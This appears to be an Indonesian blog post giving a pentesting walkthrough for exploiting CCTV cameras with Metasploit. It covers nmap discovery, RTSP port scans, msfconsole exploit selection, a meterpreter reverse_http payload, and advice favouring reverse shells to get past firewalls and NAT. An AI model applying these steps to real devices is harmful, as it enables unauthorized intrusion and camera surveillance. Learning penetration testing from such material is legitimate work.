Rabu, 30 April 2025

How to Use Metasploit for Exploitation

Berikut ini adalah catatan mengenai cara menggunakan perintah (command) pada Metasploit dalam konteks percobaan eksploitasi perangkat CCTV.

1. Koneksikan perangkat (server Pentester) agar terhubung dengan jaringan tempat CCTV berada.


2. Lakukan discovery dan scanning jaringan untuk mengetahui daftar perangkat yang aktif.

#ifconfig (check segment network)

#nmap -sn 192.168.x.0/24 (check daftar perangkat yang aktif)


3. Lakukan vulnerability assessment dengan memeriksa port-port yang terbuka pada target.

#nmap -sS 192.168.x.0/24 -O (periksa detail OS dan informasi port terbuka)

#nmap -p 554 --open 192.168.x.0/24 (pindai perangkat yang memiliki port RTSP (554)) 


4. Periksa port listening pada server Pentester.

Untuk Microsoft Windows: netstat -ano | find "1234" | find "LISTEN" tasklist /fi "PID eq 1234"

Untuk Linux: netstat -anpe | grep "1234" | grep "LISTEN"


5. Tahap eksploitasi pada server Pentester.

#msfdb start

#msfdb status

#msfdb run atau #msfconsole -q

>search irc atau search cctv

>use [id exploit]

>show options

>set RHOSTS [option IP Target]

>set RPORT [option port Target]

>show payloads

>set payload [option payload] atau set -g payloads payload/python/meterpreter/reverse_http

>set query webcamxp 

>exploit or run


Temukan Exploit ID yang tepat agar bisa melakukan eksploitasi ke perangkat yang dituju.

Gunakan payload reverse TCP jika memungkinkan, agar inisiasi koneksi berasal dari sisi client/target, bukan dari attacker. Pendekatan ini lebih mudah menembus firewall atau NAT, karena hanya membutuhkan koneksi keluar (outbound) dari target.

Sementara pada bind TCP, attacker yang harus menghubungi target secara langsung. Metode ini rentan diblokir oleh firewall atau NAT karena membutuhkan koneksi masuk (inbound) ke perangkat target.


Gunakan informasi di atas dengan bijak. Jika terdapat kekeliruan dalam penjelasan yang telah saya sampaikan sebelumnya, jangan ragu untuk memberikan masukan atau koreksinya kepada saya. Terima kasih.


Referensi:

https://www.fosslinux.com/48112/install-metasploit-kali-linux.htm

https://hackblue.org/pages/dos_attacks_using_hping3.html#

https://www.kali.org/tools/hping3/

Tidak ada komentar:

Posting Komentar